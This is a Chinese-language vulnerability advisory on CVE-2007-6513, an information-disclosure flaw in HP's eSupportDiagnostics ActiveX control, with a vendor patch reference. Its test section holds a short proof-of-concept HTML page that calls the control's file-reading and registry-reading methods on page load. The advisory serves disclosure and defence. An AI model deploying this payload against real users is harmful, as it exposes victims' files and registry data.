发布日期：2007-12-20
更新日期：2008-04-25

受影响系统：

HP eSupportDiagnostics 1.0.11 .0

描述：

---

BUGTRAQ  ID: 26967
CVE(CAN) ID: CVE-2007-6513

HP eSupportDiagnostics ActiveX控件是诊断相关应用。

HP eSupportDiagnostics ActiveX control (hpediag.dll) 1.0.11.0使用了不安全的方法fileUtil()、regUtil()，存在信息泄露漏洞。受害者如果浏览了特制的网页，远程攻击者可利用此漏洞读取文件和注册表信息。

<*来源：Elazar Broad （elazarb@earthlink.net）
  
  链接：http://xforce.iss.net/xforce/xfdb/39156
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html> <head> <script language="JavaScript" DEFER> function Check() { var out = fileUtil.ReadTextFile(somePath); var out = regUtil.ReadValue(somePath); } </script> </head> <body onload="JavaScript: return Check();"> <object id="fileUtil" classid="clsid:CDAF9CEC-F3EC-4B22-ABA3-9726713560F8" /> <object id="regUtil" classid="clsid:0C378864-D5C4-4D9C-854C-432E3BEC9CCB" /> </body> </html>

建议：

---

厂商补丁：

HP
--
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://itrc.hp.com

浏览次数：1683
严重程度：0（网友投票）